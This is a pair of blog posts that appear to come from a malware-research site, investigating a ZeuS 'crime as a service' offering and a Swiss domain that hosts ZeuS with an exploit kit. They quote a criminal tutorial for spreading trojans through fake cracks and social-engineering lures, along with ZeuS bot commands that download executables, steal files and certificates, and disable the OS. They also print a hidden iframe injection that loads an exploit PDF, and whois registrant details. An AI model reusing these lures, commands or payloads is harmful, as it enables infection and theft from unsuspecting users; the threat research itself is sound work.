Tag Archive for 'El Fiesta'

ZeuEsta: ZeuS cybercrime hosting with SPack

Recently I came across a web page which is selling ZeuS as a service. That’s not very new, but I decided to write about it anyway since the page looks quite interesting.

But first of all: What is ZeuEsta?
ZeuEsta comes from the two words ZeuS and El Fiesta. ZeuEsta is a mix of the ZeuS crimeware and the El Fiesta Exploit Kit. However, since April 17 2009 ZeuEsta is no longer sold with the El Fiesta Exploit Kit, but now in combination with SPack Exploit Kit:

17/5/2009 – Upgrade
ZeuEsta is now a mix of ZeuS and SPack not ZueS and Fiesta.

The page which I came awar is selling ZeuEsta as a service. The page seems to be very informative. You can see how many User Slots are available, how many of them are already assigned and which version of ZeuEsta is beeing used:

Load Status:

Current Version: 6.0
User Slots Filled: 4/6

Additionally you can see on the page that the ZeuEsta hosting service is already running since November 2008.

ZeuEsta Cybercrime hosting

The web page which is promoting / selling this services is called zeus-services.info and is hosted at AltaVista (Yahoo):

dig zeus-services.info

;zeus-services.info. IN A

zeus-services.info. 1200 IN A

OrgName: AltaVista Company
Address: 701 First Ave
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US

NetRange: –
NetHandle: NET-216-39-48-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Assignment
NameServer: NS1.YAHOO.COM
NameServer: NS2.YAHOO.COM
NameServer: NS3.YAHOO.COM
NameServer: NS4.YAHOO.COM
NameServer: NS5.YAHOO.COM

Here is the whois output of zeus-services.info:

Domain ID:D28733635-LRMS
Created On:09-Jun-2009 17:06:38 UTC
Last Updated On:10-Jun-2009 02:04:45 UTC
Expiration Date:09-Jun-2011 17:06:38 UTC

Sponsoring Registrar:Melbourne IT Ltd. (R141-LRMS)

Registrant ID:A124447136247250
Registrant Name:Narayan Pradeep
Registrant Organization:Pradeep
Registrant Street1:26 Wangsa Setia 4 Wangsa Melaw
Registrant Street2:
Registrant Street3:
Registrant City:Kuala Lumpur
Registrant State/Province:selangor
Registrant Postal Code:53300
Registrant Country:MY

There is a Question&Answers section on the page which describes how ZeuEsta works:

ZeuEsta works by silently redirecting traffic from websites to your ZeuEsta exploit page.

There are also some features of ZeuEsta listed on the page like the fact that ZeuEsta is exploiting IE, Firefox, Opera and Adobe Reader 6/7/8, logging outgoing browser connections (HTTP/HTTPS/FTP), stealing browser cookies and accessing all sites defined in the config file (e.g. used for stealing banking information and Credit Cards).

Much more interessting as the features of ZeuEsta is the price model of the service and what a cybercriminal gets for his money when he buys ZeuEsta Hosting:

ZeuEsta is $600 USD. (Zeus + Install on the server + 1 month free hosting). Hosting costs $100 per month. We accept payment by WU (westernunion) or LR (libertyreserve).
* Existing customers can also pay via Western Union but we do not accept it for first time customers.
After payment confirmation we will send you the following:
* 1 Months access to members area
* User/Password of your ZeuEsta Admin Panel to view logs, online bots, exploit stats, issue commands and so on.
* A specially crafted iframe to add to remote websites to generate traffic for your panel to start exploiting.
* Support on how to generate traffic, how to hide iframes and how to spread your bot.
* Weekly updated undetected binaries.
* Everything else that is listed above in features

As you can see above, the vendor of the service is offering the cybercriminals a weekly update of undetected binaries to spread the ZeuS bot. But what happens when the ZeuEsta hosting sevice runs out and the cybercriminal fails to pay for the service for another month? Well, the vendor of the ZeuEsta will just sell the ZeuS botnet to another customer:

After that 2 weeks is over your bots will be updated / Sold off to another client and be gone for good.

If the cybercriminal is still not feeling confident, the vendor offers him a free demo of the ZeuEsta hosting service.

There is also a tutorial on the page which is describing different ways to spread the ZeuS bot:

Filename: Spread bots.txt
In this tutorial/guide, I am going to tell you ways to spread your bot/trojan.

1. Torrents
This is pretty easy, and pretty successful.

First you need a torrent client, I use uTorrent, because it’s the easiest.

Once you get your torrent client, make a folder full of .zip files with names of popular programs (e.g. Kaspersky 2009 Crack.zip) and put your bot/trojan inside.

Now you need to create the torrents.
Open uTorrent (or your other torrent client), and click File|Create New Torrent… Then add one of your fake programs (The Kaspersky 2009 Crack.zip or what ever).

Now you need to add trackers.

Code: Select all
Here are some good trackers you can use:






Don’t check private, but do check start seeding.

Now click Create and save as..

Once you save, go to thepiratebay.org, and register, and click upload torrent.

Do this too all of your fake cracks or programs.

You can also get programs or stuff that people might want, and just bind your bot/trojan to it then create the torrent that way (takes longer, but more people might download it).

2. Crack Request forums
This way is pretty easy and is pretty effective.

First get hosting that allows custom 404 pages (I suggest getting a .info domain from godaddy (only $0.99), because you can upload viruses, and have custom error 404 pages.

Once you get this, upload your bot/trojan to you hosting (e.g. “www.freefileupload247.info/files/bot.exe”), then make the custom 404 page “www.freefileupload247.info/files/bot.exe” (or what ever you uploaded you bot/trojan as).

Then no matter what url someone goes to on your site, it will download your bot/trojan
(like “www.freefileupload247.info/files/34736745/asdfasdg.exe” or “www.freefileupload247.info/a.exe” or even better “www.freefileupload247.info/files/2765345/Kaspersky.2009.Crack.exe”)

Then find a software cracking forum that has a subform for “Crack Requests”.
Then you click on a whole bunch of the requests and reply to all of them with something like this:

I found the keygen for it:
That is a good way of doing it.

3. Chatrooms
Here is another good way.
Go on some chatroom somewhere and put your name as something like Jenna247. Then PM a bunch of guys with something like this:

Heyy my name is Jenna asl?
You want to see a picture of me?
I don’t know if you can open it, I’m on a mac.

If you rename a .exe file to a .pif, it will run just as the .exe does, so with your custom 404, if they go to your server /anything.pif, if will download your bot/trojan) And a .pif file looks like it could be a picture >:D

You could do this to a bunch of people at once, or make your bot do it.

4. Email
Not that easy, but could be good.

Make your bot/trojan get a list of all the zombie’s (infected computer) contacts, and have it send out an email from a random email address (such as SmithJenna247@yahoo.com) with something like this:

Hey it’s Jenna, I don’t think you remember me, but we met a while ago.
Here is a picture of us: “http://www.freefileuploads247.com/pictures/342772/2008_36327.pif”

Then if someone from their contacts downloads it, it will send to to all their contacts and so on.

I hope this tutorial/guide helped you, if you have anything to add, please do so.

All Rights Reserved © 2008 – 2009 by www.Zeus-ServiceS.Info

Another File is describing the ZeuS Commands:

Filename: Zeus Commands.txt
Zeus commands are available now:

Command and its parameters are written on the rules of the configuration file

Quote:block_fake [URL-mask] – call blocking any URL-redirect, URL-mask which will be treated under the URL-mask this team.

unblock_fake [mask] – from a list of blocked URL-redirects will remove all URL-masks, which will be treated under the URL-mask of this team.

block_url – call blocking any URL, which will coincide with the URL-mask of this team.

unblock_url- from the list of blocked URL will remove all URL-masks, which will be treated under the URL-mask of this team.

rexec “http://taarar.com/tvoj.exe” – upload exe
rexeci “http://taarar.com/tvoj.exe” – f – ignore version of config
lexec “C: \ windows \ system32 \ calc.exe” – will open a calculator for this user (for example, the calculator, can open any other)
resetgrab – re-purification Cookies, protect storage
getmff – get solfiles with bots
delmff – clear solfiles
getcert – to obtain certificates of all hranilish
addsff “*. doc” – get all the evidentiary files Bot
getfile “kkk.doc” – receive a file with the bot

upcfg [url] – after receiving the command boat immediately try to download a configuration file in a standard URL.
Quote:kos – incapacitate OS, namely grip branches HKEY_CURRENT_USER registry and / or HKEY_LOCAL_MACHINE.
If you have sufficient privileges – fly to “blue screen”, in other cases creates the brakes. Following these steps, loading OS will not be possible!

All Rights Reserved © 2008 – 2009 by www.Zeus-ServiceS.Info

While I was doing some research in this case I came accross a forum topic where some people talked about ZeuEsta. There are some interessting posts concering this topic like that the original price for ZeuEsta is about $150 (zeus-services.info is selling it for 600$). Another one says:

[...] I got a botnet with 800 zombies (mostly USA) :)

In a another forum the vendor of ZeuEsta hosting says:

ZeuEsta Hosting is now back!

ZeuEsta Hosting has been around since November 2008, we have had a 90+ day downtime to stop google and firefox listing our domains as malicious and are ready to go again.[...]

And later:

Domain has been suspended, new domain up over the next few weeks.

Now he is selling the service using the two domains zeus-services.info / zeus-service.blogspot.com.

Last but not least there are some contact informations on the page:

YIM: zeus.services or email us at info@zeus-services.info


It’s interessting to see that two crimeware kits are beeing combined (ZeuS and SPack). It seems that there is a price competition in the criminal underground and that the price for the same crimeware kit can vary from just a few dollars up to hundreds of dollars and more.

But the six slots for customers which the ZeuEsta hosting service offers is just a drop in a bucket: There are currently more than 200 well known hosts around the globe which are spreading the ZeuS trojan and/or acting as Command&Control Server (C&C) for ZeuS infected bots (see abuse.ch ZeuS Tracker). According to Damballa, ZeuS has with 3.6 million infected computers the most infected computers in United States (Source: Network World: America’s 10 most wanted botnets).

During my reasearch I came across some post where vendors of such crimeware services / crimeware kits are complaining about DDoS attacks againts their site(s) where they are selling their services / crimeware kits. Obviouslye criminals are not only attacking legitim websites (like abuse.ch) using DDoS attacks, but are also fighting against each other.

Cybercrime is a dirty business – Keep your hands off :)

Further reading

.CH Domain verbreitet ZeuS-Trojaner

Auch die schweizer Top Level Domain (kurz TLD) .ch wird nicht davor verschont, für die gezielte Verbreitung des ZeuS-Trojaners (aka wsnpoem / zbot) missbraucht zu werden. Ein gutes Beispiel dafür ist die Domain toureg-cwo.ch:

whois: This information is subject to an Acceptable Use Policy.
See http://www.switch.ch/id/terms/aup.html

Domain name:

Holder of domain name:
Tikhomirov Nikita
Gilyarovskogo street bld.65 apt.41

RU-129110 Moscow
Russian Federation
Contractual Language: German

Technical contact:
Tikhomirov Nikita
Gilyarovskogo street bld.65 apt.41

RU-129110 Moscow
Russian Federation

Name servers:

Die Domain wurde bei SWITCH registriert, welche für die schweizer TLD .ch zuständig ist. Laut Whois ist die Domain auf einen Tikhomirov Nikita aus Moskau (Russland) registriert. Interessant ist, dass als Kontakt Sprache jedoch Deutsch angegeben ist:

Contractual Language: German

So weit so gut – schauen wir uns einmal an, was die Webseite denn so zu bieten hat:


Das einzige, was wir zu sehen bekommen, ist eine Standard-Page mit der Information, dass noch kein Inhalt auf den Server geladen wurde. Was wir auch sehen, ist ein Datum welches angibt, wann die Seite erstellt wurde:

Date Created: Wed Feb 25 06:06:21 2009

Wer bereits schon einmal eine typische ZeuS-Domain gesehen hat weiss, dass viele dieser Domains eine solche Standard-Page wie oben gezeigt verwenden.

Im Server-Verzeichnis fta finden wir das Exploit-Toolkit El Fiesta, welches immer wieder verwendet wird, um dem Besucher durch Drive-By exploits über ungepatchte Sicherheitslücken im Web-Browser sowie anderen Anwendungen (z.B. Adobe Reader und Adobe Flash Player) den ZeuS Trojaner oder andere Malware unterzujubeln. In dem Beispiel hier ist der Adobe Reader die Zielscheibe:

document.write(“<\iframe src='http://toureg-cwo.ch/fta/pdf.php?id=1552‘ width=1 height=1 frameborder=0><\/iframe>“);

Dabei wird ein PDF an den Browser gesendet, welches versucht, eine Lücke im Adobe Reader auszunutzen:

Filename: 1.pdf
File size: 7398 bytes
MD5…: 35a45ec077ded26a6087cf01bd2d6b90
SHA1..: 7c04f364085c29461c94d8d6416724d00a3c4374
Erkennungsrate: 11/39 (28.21%)

Ist das ausnützten der Schwachstelle erfolgreich, wird der ZeuS-Trojaner auf dem System des Besuchers installiert, welcher in diesem Fall Login-Informationen von Online-Diensten wie z.B. Myspace aber auch zu Online-Banking Accounts ausspioniert und an eine dropzone (C&C) sendet:


Filename: ldr.exe
File size: 69120 bytes
MD5…: f4445e12309f491ed0780234d74f8c92
SHA1..: 897b1588ee84909972a38489f9c246eba2ad65ea
Erkennungsrate: 11/39 (28.21%)

Wie man gut erkennen kann, befindet sich die ZeuS Installation im Server-Verzeichnis “zs”:

Trojaner-Binary: toureg-cwo.ch/zs/ldr.exe
Config-File: toureg-cwo.ch/zs/cfg.bin
Dropzone: toureg-cwo.ch/zs/s.php
ZeuS Admin Panel: toureg-cwo.ch/zs/in.php

Was mich an dieser Stelle beruhigt ist die Tatsache, dass laut El Fiesta Statistik die Domain hauptsächlich dazu verwendet wird, Besucher aus Grossbritannien zu infizieren:


Nun Fragt sich, wie eine Domain wie diese rasch möglichst offline genommen werden kann. Viele stellen sich dies jedoch einfacher vor, als es tatsächlich ist. Die Domain toureg-cwo.ch ist zwar in der Schweiz registriert, wird jedoch in China bei der China Telecom (CHINANET) gehostet:

;toureg-cwo.ch. IN A

toureg-cwo.ch. 3600 IN A

inetnum: –
netname: CHINANET-SC
descr: CHINANET Sichuan province network
descr: Data Communication Division
descr: China Telecom
country: CN

Wer bereits einmal einen Blick die Statistik des ZeuS Trackers geworfen hat weiss, dass China Telecom in den Top ten ZeuS hosters auftaucht:


Die Chancen, den entsprechenden Server bei der China Telecom herunter zu nehmen, sind also relativ schlecht. Eine weitere Möglichkeit wäre, die Domain direkt beim Registrar (SWITCH) löschen zu lassen. Das Problem: Die gesetzlichen Grundlagen dazu geben nicht immer eine eindeutige Antwort darauf, wann SWITCH eine Löschung einer Domain vornehmen darf oder gar muss, wenn Hinweise auf illegale Inhalte vorliegen. Ausserdem waren bisher die Anforderungen an die Überprüfung der Identität des Domäneninhabers minimal, um eine sofortige Aktivierung neuer Domänen zu ermöglichen. Was diesen Punkt betrifft, so stehen in Kürze gesetzliche Änderungen an; deren Wirksamkeit muss sich aber erst weisen. Es liegt auf der Hand, dass die Überprüfung einer Adresse in Russland schwierig, aufwendig und kostenintensiv ist und daher nicht im komerziellen Interesse von SWITCH liegen kann. Daher sind stichhaltige und eindeutige gesetzlichen Grundlagen essentiell, wofür das Schweizerische Bundesamt für Kommunikation (BAKOM) zuständig ist.

Die Erkenntnis, dass die Domain zwar für Illegale Zwecke verwendet wird und die Marke “Schweiz” trägt (TLD .ch), wir jedoch aus Sicht des Gesetzes nichts dagegen machen können, ist vielen ein Dorn im Auge. Die Schweiz hat hier ganz klar Nachholbedarf. Es ist wichtig, dass wir als Schweiz den Kriminellen in solchen Fällen ein ganz klares Signal senden: Bei uns nicht! Ansonsten droht der Schweiz Top Level Domain .ch das selbe Schicksal wie z.B. der TLD .biz, .info, .ru und .cn, welche zu Haufen für Illegale Zwecke Registriert und Missbraucht werden (Siehe 1, 2, 3 und 4).